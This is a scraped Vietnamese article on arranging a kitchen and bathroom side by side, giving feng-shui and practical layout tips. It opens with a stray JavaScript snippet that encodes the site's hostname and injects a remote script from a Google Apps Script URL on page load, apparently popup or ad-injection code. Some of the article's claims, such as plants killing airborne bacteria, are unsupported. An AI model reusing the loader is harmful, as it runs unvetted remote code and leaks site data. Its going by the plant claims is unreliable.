var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách bố trí nhà bếp và nhà vệ sinh phù hợp

Cập nhật lần cuối vào 22/06

Nhà vệ sinh và nhà bếp đặt cạnh nhau là điều không nên nhưng với ngôi nhà nhỏ thì không thể tránh khỏi. Tham khảo bài viết dưới đây để có cách bố trí phù hợp.

Sự phát triển của đô thị hóa khiến diện tích các ngôi nhà không được rộng rãi mà thường bị bó hẹp, hạn chế về mặt không gian. Do đó, khi thiết kế nhà, người ta thường tiết kiệm diện tích mà bố trí các phòng liền kề nhau. Nhà bếp và nhà vệ sinh đôi khi cùng liền kề để thuận tiện cho việc sử dụng và tối ưu không gian. Mặc dù vậy, các nhà phong thủy cho rằng, việc bố trí nhà bếp liền nhà vệ sinh sẽ mang tới những điều không may mắn cho gia chủ. Bài viết dưới đây đưa ra những cách bố trí nhà bếp và nhà vệ sinh được cho là đáp ứng được cả yếu tố khoa học và phong thủy. Mời các bạn tham khảo.

1. Phân tách không gian nhà bếp và nhà vệ sinh độc lập

Khi thiết kế nhà bếp cạnh nhà vệ sinh, cần xây tường kín hoặc sử dụng vách ngăn để nhà vệ sinh không làm ảnh hưởng đến không gian nhà bếp cũng như không gian chung. Đối với không gian văn phòng ta có vách ngăn văn phòng đẹp đối với không gian phòng bếp và nhà vệ sinh giải pháp tối ưu cho bạn đó là việc thay thế những bức tường khô cứng, cũ kỹ bằng những tấm vách ngăn thạch cao, điều này vừa tiết kiệm tối đa diện tích, giảm chi phí thi công và lắp đặt, tăng tính thẩm mỹ cho không gian gia đình bạn. Ngoài ra, những tấm vách ngăn này bạn có thể dể dàng thay thế bằng những sản phẩm khác tùy thuộc vào mục đích sử dụng ở mỗi thời điểm khác nhau của người dùng.

Cần phải phân tách không gian nhà bếp và nhà vệ sinh độc lập

Sử dụng vách ngăn hoặc tường để phân chia không gian phòng bếp và nhà vệ sinh

Còn đối với khu vực nhà vệ sinh, đây là môi trường đặc biệt luôn trong tình trạng ẩm ướt nếu sử dụng các loại cửa gỗ thông thường sẽ nhanh bị phồng và hư hỏng. Trên thị trường hiện nay có rất nhiều loại vách ngăn dành riêng cho nhà vệ sinh như: vách ngăn vệ sinh Compact, vách ngăn MFC.. vừa có tính thẩm mỹ cao nhưng vẫn đảm bảo được độ bền, độ kín, đặc biệt là khả năng chống nước, phù hợp với việc lắp đặt tại nhà vệ sinh.

2. Tránh đặt khu vệ sinh lên trên đầu bếp hoặc tránh nằm ngủ dưới phòng vệ sinh

Khi phòng vệ sinh nằm vào vị trí hung, dĩ nhiên không gian kề cận cũng nằm trong hệ thống liên quan như đường ống, hộp kỹ thuật, thông thoáng, lối đi… Vì thế, các phòng vệ sinh trên dưới thẳng hàng nhau sẽ hợp lý về phương vị hơn.

Nếu đưa bếp (Hỏa) vào khu có Thủy bên trên thì sẽ gặp xung khắc ngũ hành. Còn vị trí giường ngủ luôn cần toạ cát nên không thể trùng phương vị tọa hung của khu vệ sinh được.

3. Không thiết kế cửa nhà vệ sinh đối diện cửa nhà bếp

Cửa nhà vệ sinh và nhà bếp đối diện nhau là điều tối kị trong phong thủy. Do đó, khi thiết kế cửa nhà vệ sinh và cửa nhà bếp, nên tham khảo các kênh thông tin khác nhau để có sự bài trí hợp lý. Bạn quan tâm tham khảo những chia sẻ từ bài viết: cách bố trí bếp và nhà vệ sinh mang lại may mắn và tài lộc cho gia chủ.

Không thiết kế cửa nhà vệ sinh đối diện cửa bếp

Không thiết kế cửa nhà vệ sinh đối diện cửa bếp

4. Không thiết kế rườm rà

Cả nhà bếp và nhà vệ sinh đều cần được thường xuyên vệ sinh và lau dọn. Do đó, những chi tiết quá rườm rà sẽ khiến việc làm vệ sinh gặp nhiều khó khăn, những đồ vật ở trong góc, những góc khuất không được làm sạch có thể là nơi trú ẩn của vi khuẩn.

Ngoài ra, việc thiết kế màu sắc cho nhà bếp và nhà vệ sinh cũng rất quan trọng. Nên sử dụng những màu tối, hạn chế màu sáng, đặc biệt là màu trắng. Nếu ngôi nhà của bạn có thiết kế kiểu nhà ống và bạn đang muốn tham khảo mẫu thiết kế khu vực phòng bếp và nhà vệ sinh bạn tham khảo những chia sẻ từ bài viết Cách bố trí nhà vệ sinh trong nhà ống hợp phong thủy

5. Chọn vị trí phù hợp cho nhà bếp

Chúng ta đều biết rằng, phòng bếp là nơi chuẩn bị và lưu trữ thức ăn. Mà thức ăn là nguồn chính có tác dụng với sức khỏe của cả gia đình, chính vì thế việc có một không gian yên tính và thoải mái để sáng tạo món ăn là rất quan trọng. Vậy đối với phòng bếp bạn nên bố trí như thế nào cho hợp phong thủy?.

Trước hết, xét về vị trí, theo phong thủy, vị trí tốt nhất của phòng bếp là hướng Đông hoặc Đông Nam. Bài viết Mẹo hay: Bài trí phòng bếp đón tài lộc năm 2017 sẽ giúp bạn có những gợi ý thú vị.

6. Bài trí nhà bếp

Trong trường hợp nhà bếp buộc phải nằm cạnh nhà vệ sinh thì việc bài trí nhà bếp hợp lý cũng có thể hạn chế những ảnh hưởng của nhà vệ sinh tới nhà bếp. Có thể đặt bồn rửa chén cạnh nhà vệ sinh rồi đến tủ lạnh, tủ chén, … rồi cuối cùng là bếp đặt xa nhà vệ sinh nhất.

Nên đặt bồn rửa bát gần nhà vệ sinh sau đó đến các đồ dùng khác

Nên đặt bồn rửa bát gần nhà vệ sinh sau đó đến các đồ dùng khác

Ngoài ra, phòng bếp nên có một chiếc gương. Nếu không có gương, bạn có thể treo một vài bức tranh phong cảnh trên tường để thay thế như vậy người nấu sẽ cảm thấy yên bình và dễ chịu hơn khi vào bếp.

7. Giữ cho nhà vệ sinh và nhà bếp luôn sạch sẽ

Vệ sinh thường xuyên nhà vệ sinh và nhà bếp sẽ hạn chế được những tác hại từ hai môi trường này. Do đó, có thể bố trí quạt thông gió, cửa sổ cho nhà vệ sinh, chà rửa thường xuyên. Với nhà bếp, cần giữ khô ráo, luôn rửa sạch chén đĩa sau khi ăn, không nên để quá lâu. Khi không có nhu cầu sử dụng nhà vệ sinh, nên đóng kín để mùi và vi khuẩn từ đây không làm ảnh hưởng đến khu vực xung quanh. Ngoài ra, bạn có thể đặt các chậu cây lửa hổ, lan ý hay cây lô hội… với tác dụng hút bụi bẩn, tiêu diệt các loài vi khuẩn trong không khí giúp loại bỏ các khi độc và thanh lọc không khí hiệu quả. Tham khảo chi tiết tại bài viết: Nên trồng cây gì trong nhà vệ sinh

Trên đây là những gợi ý về cách bài trí nhà vệ sinh và nhà bếp cạnh nhau mà người thiết kế cần chú ý để đảm bảo về khoa học, tiện dụng và phong thủy. Mong rằng, các bạn sẽ có được ngôi nhà ưng ý nhất với những thông tin trên.

Nguồn: vachnganvietnam.vn